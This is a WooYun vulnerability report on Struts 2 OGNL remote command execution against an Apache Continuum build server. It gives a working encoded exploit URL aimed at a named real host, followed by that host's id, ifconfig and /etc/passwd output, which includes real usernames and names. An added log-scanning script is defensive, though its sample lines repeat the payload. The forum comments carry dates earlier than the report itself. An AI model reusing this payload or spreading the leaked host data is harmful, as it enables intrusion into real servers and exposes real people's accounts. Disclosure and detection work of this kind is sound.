
WooYun-2013-00006: Apache Software Foundation subsite remote command execution

Vendor: The Apache Software Foundation
Author: 猪猪侠
Submitted: 2013-09-20 08:33
Published: 2013-09-25 08:33
Vulnerability type: Application misconfiguration
Hazard level: high
Rank: 20
Status: notified but neglected by the vendor
Source: http://www.wooyun.org
Tag: Remote command execution

Details

Disclosure time-line:

2013-09-20: Vendor has been notified, waiting for response
2013-09-25: Vendor has neglected the vulnerability, details opened to the public

Abstract:

# Apache, Mind Yourself

Apache Struts 2: manipulating request parameters prefixed with "action:", "redirect:" or "redirectAction:" lets an attacker inject OGNL expressions and achieve remote command execution on the server.
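As an added example that is not part of the original report, the Python script below shows how a defender can spot this class of request in web-server access logs. It splits each query string on "&" and the first "=" before URL-decoding (so a percent-encoded "=" inside a payload cannot hide the parameter), looks for parameter names carrying the action:/redirect:/redirectAction: prefixes that Struts 2 honoured before 2.3.15.1, and classifies a hit as OGNL injection when an expression marker (${ or %{) follows the prefix, or as the plain redirect abuse covered by S2-017 otherwise. The log lines, IP addresses and hostnames are constructed for this example; the second line mirrors the shape of the URL in the report.

```python
"""Flag Struts 2 action:/redirect:/redirectAction: prefix abuse (S2-016 / S2-017)
in combined-format access logs.  Added example; all sample data is constructed."""
import re
from urllib.parse import unquote_plus

# Parameter-name prefixes that Struts 2 (before 2.3.15.1) interpreted specially.
PREFIXES = ("action:", "redirect:", "redirectaction:")
# OGNL expression markers; one of these after a prefix is the S2-016 pattern.
OGNL_MARKERS = ("${", "%{")

# Request line of a combined-format access log entry (constructed format assumption).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def split_query(target):
    """Return decoded (name, value) pairs from the query string of a request target.
    Splitting happens *before* decoding so that a percent-encoded '=' or '&'
    inside an injected expression does not break the parameter apart."""
    if "?" not in target:
        return []
    pairs = []
    for raw in target.split("?", 1)[1].split("&"):
        if not raw:
            continue
        name, _, value = raw.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def classify_request(target):
    """Classify one request target.  Returns None when nothing is suspicious,
    otherwise a dict naming the finding and the offending parameter."""
    for name, value in split_query(target):
        lowered = name.lstrip().lower()
        prefix = next((p for p in PREFIXES if lowered.startswith(p)), None)
        if prefix is None:
            continue
        # Everything after the prefix (plus any value) is what Struts evaluated.
        rest = name[len(prefix):] + value
        if any(marker in rest for marker in OGNL_MARKERS):
            return {"finding": "ognl-injection", "severity": "high", "param": name[:60]}
        # A prefix without an expression is the S2-017 open-redirect pattern.
        return {"finding": "prefix-redirect", "severity": "medium", "param": name[:60]}
    return None


def scan_log(lines):
    """Run classify_request over every parsable log line; return the alerts."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hit = classify_request(m.group("target"))
        if hit:
            alerts.append({"ip": m.group("ip"), "ts": m.group("ts"), **hit})
    return alerts


# Constructed sample log lines (not taken from the report).
SAMPLE_LOG = [
    '10.0.0.5 - - [20/Sep/2013:08:31:02 +0000] "GET /continuum/groupSummary.action HTTP/1.1" 200 5120',
    '203.0.113.9 - - [20/Sep/2013:08:33:10 +0000] "GET /continuum/groupSummary.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(%27id%27)).start()} HTTP/1.1" 302 0',
    '203.0.113.9 - - [20/Sep/2013:08:34:00 +0000] "GET /continuum/groupSummary.action?redirect:http://evil.example/phish HTTP/1.1" 302 0',
    '10.0.0.7 - - [20/Sep/2013:08:35:00 +0000] "GET /continuum/projectGroupSummary.action?projectGroupId=6&action=view HTTP/1.1" 200 3000',
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

The ordinary parameter named "action" (without the colon) in the last sample line is deliberately not flagged: the prefix is only meaningful with the trailing colon, and matching on the bare word would drown the alert in false positives on any Struts application.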

Details:

#show the webroot

http://vmbuild.apache.org/continuum/groupSummary.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'whoami'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matr%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23matt.getWriter().println(%23matr.getRealPath(%22/%22)),%23matt.getWriter().flush(),%23matt.getWriter().close()}

/home/continuum/apache-continuum-1.4.1/apps/continuum

Proof of concept:

#id

uid=1001(continuum) gid=1001(continuum) groups=1001(continuum)

#/sbin/ifconfig

eth0      Link encap:Ethernet  HWaddr 00:50:56:ae:00:0b
          inet addr:140.211.11.54 Bcast:140.211.11.255 Mask:255.255.255.0
          inet6 addr: fe80::250:56ff:feae:b/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
          RX packets:22081926 errors:0 dropped:0 overruns:0 frame:0
          TX packets:7627912 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:26173286052 (26.1 GB) TX bytes:3491916802 (3.4 GB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1 Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING MTU:16436 Metric:1
          RX packets:42196069 errors:0 dropped:0 overruns:0 frame:0
          TX packets:42196069 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:24001777186 (24.0 GB) TX bytes:24001777186 (24.0 GB)

#cat /etc/passwd


root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
landscape:x:102:108::/var/lib/landscape:/bin/false
gmcdonald:x:1000:1000:gmcdonald,,,:/home/gmcdonald:/bin/bash
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
continuum:x:1001:1001::/home/continuum:/bin/sh
archiva:x:1002:1002::/home/archiva:/bin/sh
postfix:x:104:113::/var/spool/postfix:/bin/false
messagebus:x:105:115::/var/run/dbus:/bin/false
avahi:x:106:116:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
brett:x:1717:1717::/home/brett:/bin/bash
mysql:x:107:117:MySQL Server,,,:/var/lib/mysql:/bin/false
smmta:x:108:118:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:109:119:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
apbackup:x:1718:1718::/home/apbackup:/bin/sh
pctony:x:2097:2097::/home/pctony:/bin/bash
ntp:x:110:120::/home/ntp:/bin/false
evenisse:x:1003:1003:Emmanuel Venisse,,,:/home/evenisse:/bin/bash
puppet:x:111:121:Puppet configuration management daemon,,,:/var/lib/puppet:/bin/false
olamy:x:1004:1004:Olivier Lamy,,,:/home/olamy:/bin/bash
usbmux:x:112:46:usbmux daemon,,,:/home/usbmux:/bin/false
markt:x:1787:1787:medthomas:/home/markt:/bin/bash

Solutions:

It is strongly recommended to upgrade to Struts 2.3.15.1, which contains the corrected Struts2-Core library.

http://struts.apache.org/release/2.3.x/docs/s2-016.html

http://struts.apache.org/release/2.3.x/docs/s2-017.html

Copyright: please credit the source 猪猪侠@WooYun when reposting


Response

Vendor comments:

Hazard rating: neglectable, ignored by vendor

Ignored date: 2013-09-20 08:33

Vendor response:

Latest status: N/A



Comments

  1. 2013-08-01 15:22 | 疯狗 ( intern whitehat | no vulnerability yet | xxxxx)
    0

    gelivable!

  2. 2013-08-01 15:23 | VIP ( intern whitehat | Rank:0 vulnerabilities:1 | Use your own Chinese signature and give the foreigners a headache!!!!...)
    0

    niubivable!

  3. 2013-08-01 18:30 | imlonghao ( intern whitehat | no vulnerability yet | ...)
    0

    Excellent,,

  4. 2013-08-01 22:37 | 0x0F ( intern whitehat | no vulnerability yet | This person is very clever and left no evidence at all...........)
    0

    what?

  5. 2013-08-01 22:39 | 霸气帝王攻 ( intern whitehat | no vulnerability yet | Focused on the internet)
    0

    what's up man?Don't give up . we fucking just do it.you got it?

  6. 2013-08-01 22:44 | 0x0F ( intern whitehat | no vulnerability yet | This person is very clever and left no evidence at all...........)
    0

    @霸气帝王攻 Public. Civilization, please.

  7. 2013-08-02 15:12 | 心伤的胖子 ( intern whitehat | no vulnerability yet | Heartbroken, hence fat.)
    0

    Mind-blowing! PS: will the foreigners bother to translate what I said?

  8. 2013-08-03 18:37 | Rookie ( intern whitehat | no vulnerability yet )
    0

    @心伤的胖子 Will the foreigners use Google Translate?

  9. 2013-08-03 19:00 | imlonghao ( intern whitehat | no vulnerability yet | ...)
    0

    @Rookie Yes,they will.

  10. 2013-08-03 19:25 | tzrj ( intern whitehat | no vulnerability yet | ส็็็็็็็็็็็็็็็็็็็...)
    0

    Damn, commenting actually requires a captcha XXXXXXXXXXXXXXXXXXXXXX

  11. 2013-08-03 20:56 | 元芳 ( intern whitehat | no vulnerability yet | My lord, what do you think?)
    0

    what?

  12. 2013-08-04 22:47 | xiaogui ( intern whitehat | no vulnerability yet | Here to watch the big shots~~~)
    0

    diaobaoivable

  13. 2013-08-07 14:49 | 浮生 ( intern whitehat | no vulnerability yet | If you see what I see, if you feel as I ...)
    0

    They surely can't understand this...

  14. 2013-08-23 19:14 | Lee Swagger ( intern whitehat | no vulnerability yet | Wash up and go to sleep)
    0

    so busy, damn ╭︿︿︿╮ {/ o o /} ( (oo) ) ︶ ︶︶

  15. 2013-09-21 11:28 | VIP ( intern whitehat | Rank:0 vulnerabilities:1 | Use your own Chinese signature and give the foreigners a headache!!!!...)
    0

    Sure enough, it was published automatically

  16. 2013-09-23 19:16 | 邪少 ( intern whitehat | no vulnerability yet | QQ:964323781)
    0

    Foreigners... can they understand what we write... ha

  17. 2013-10-14 19:20 | x0ers ( intern whitehat | no vulnerability yet | Focused on computers: 20 years of power on, power off, reboot.)
    0

    test

  18. 2013-11-28 16:32 | jaojan ( intern whitehat | no vulnerability yet | xss my life)
    0

    nice
